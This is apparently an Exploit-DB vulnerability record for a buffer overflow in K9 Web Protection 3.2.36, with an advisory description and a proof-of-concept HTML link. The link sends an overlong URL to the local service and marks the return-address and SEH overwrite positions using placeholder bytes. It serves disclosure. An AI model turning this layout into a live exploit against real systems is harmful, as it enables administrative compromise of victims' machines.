BlueCoat K9 Web Protection Overflow

vendor:

K9 Web Protection

by:

Dennis Rand

7.5

CVSS

HIGH

Buffer-Overflow

119

CWE

Product Name: K9 Web Protection

Affected Version From: 3.2.36

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:bluecoat:k9_web_protection:3.2.36

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

BlueCoat K9 Web Protection Overflow

The K9 Web Protection software is vulnerable to a buffer-overflow vulnerability that allows an attacker to execute arbitrary code with administrative privileges. This can lead to the complete compromise of the affected system.

Mitigation:

Apply the latest patch or update to a non-vulnerable version of the software.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24373/info

K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.

An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system.

K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well.

<html>
<head>
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
<center>
</center>
</head>
<body>
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</h4></center>
<br><b>http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA] </b><br>
<br><li> Return Address = DCBA
<br><li> Pointer to the next SEH record = BBBB
<br><li> SE Handler = AAAA
<br>
<center>
<b><A
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
</center>
</body>
</html>